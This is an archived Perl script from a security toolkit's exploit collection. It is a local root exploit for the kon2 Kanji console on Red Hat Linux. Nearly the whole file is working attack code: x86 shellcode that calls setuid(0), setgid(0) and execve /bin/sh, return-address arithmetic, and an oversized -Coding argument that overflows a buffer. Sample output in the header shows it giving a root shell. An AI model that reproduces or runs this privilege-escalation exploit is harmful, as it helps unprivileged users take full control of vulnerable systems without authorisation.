home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / priv8kon.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  1.3 KB  |  44 lines
  1. #!/usr/bin/perl
  2. ####################################################################################
  3. #Priv8security.com kon2 version 0.3.9b-16 and < local root exploit.
  4. #
  5. #    Tested on Redhat 8.0. should work on 9.0 and 7.3
  6. #    Bug happens on -Coding arg.
  7. #    Based on Redhat Advisory.
  8. #
  9. #    [wsxz@localhost buffer]$ perl priv8kon.pl
  10. #    -=[ Priv8security.com kon local root exploit ]=-
  11. #    usage: priv8kon.pl offset
  12. #    [+] Using ret shellcode 0xbfffffc6
  13. #    Kanji ON Console ver.0.3.9 (2000/04/09)
  14. #
  15. #    KON> video type 'VGA' selected
  16. #    KON> hardware scroll mode.
  17. #    sh-2.05b# id
  18. #    uid=0(root) gid=0(root) groups=500(wsxz)
  19. ####################################################################################
  20.  
  21.  
  22. $shellcode =
  23. "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
  24. "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
  25. "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
  26. "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
  27.  
  28. $path = "/usr/bin/kon";
  29. $ret = 0xbffffffa - length($shellcode) - length($path);
  30.  
  31. $offset = $ARGV[0];
  32.  
  33. print "-=[ Priv8security.com kon2 local root exploit ]=-\n";
  34. print "usage: $0 offset\n";
  35. printf("[+] Using ret shellcode 0x%x\n",$ret + $offset);
  36.  
  37. $new_retword = pack('l', ($ret + $offset));
  38. $buffer2 = "A" x 796;
  39. $buffer2 .= $new_retword;
  40. $buffer = $shellcode;
  41. local($ENV{'WSXZ'}) = $buffer;
  42. exec("$path -Coding $buffer2");
  43.  
  44.